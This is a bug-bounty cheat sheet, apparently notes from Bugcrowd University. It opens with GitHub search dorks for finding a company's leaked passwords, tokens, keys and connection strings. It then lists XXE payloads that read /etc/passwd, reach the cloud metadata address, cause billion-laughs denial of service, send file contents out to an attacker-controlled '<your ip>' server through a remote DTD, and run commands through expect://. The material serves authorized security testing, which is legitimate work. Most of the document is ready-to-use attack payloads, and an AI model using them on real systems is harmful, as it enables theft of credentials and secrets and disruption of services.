Bugcrowd University Summary

GITHUB
"example.com" "ssh|sftp|ftp|proxy|vpn|vsphere|internal|siem|firewall"
"Company" password|secret|credentials|token|config|key|secret|pass|login|ftp|pwd
"Company" security_credentials|connectionstring|JDBC|ssh2_auth_password|send_keys|send,keys
"Company" language:{programming language} keyword
"Company" language:{programming language} keyword NOT some_keyword_you_dont_want
org:organization_name
user:username_github
"example.com" dotfiles

https://github.com/michenriksen/gitrob
https://github.com/random-robbie/keywords/
https://github.com/Shashank-In/TravisLeaks
https://gist.github.com/EdOverflow/4d96b379da40b6c9006ac5e721450651


CLASSIC XXE
<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [<!ENTITY xxe "file:///etc/passwd"> ]>
		<userinfo>
			<firstName>Test</firstName>
			<lastName>&xxe;</lastName>
		</userinfo>

SSRF
<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [<!ENTITY xxe "http://169.254.169.254/"> ]>
		<userinfo>
			<firstName>Test</firstName>
			<lastName>&xxe;</lastName>
		</userinfo>

DOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ENTITY a0 "dos" ><!ELEMENT ax (#PCDATA)>
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

ADVANCED XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ENTITY % remote SYSTEM "http://<your ip>/call.dtd"> %remote; ]>

Content of host.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<your ip>/collect.php?file=%file;'>">
%all;

<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://<your ip>/host.dtd">
%dtd;
]>
<roottag>&send;</roottag>


RCE
<!DOCTYPE replace [<!ENTITY ent SYSTEM "expect://whoami"> ]>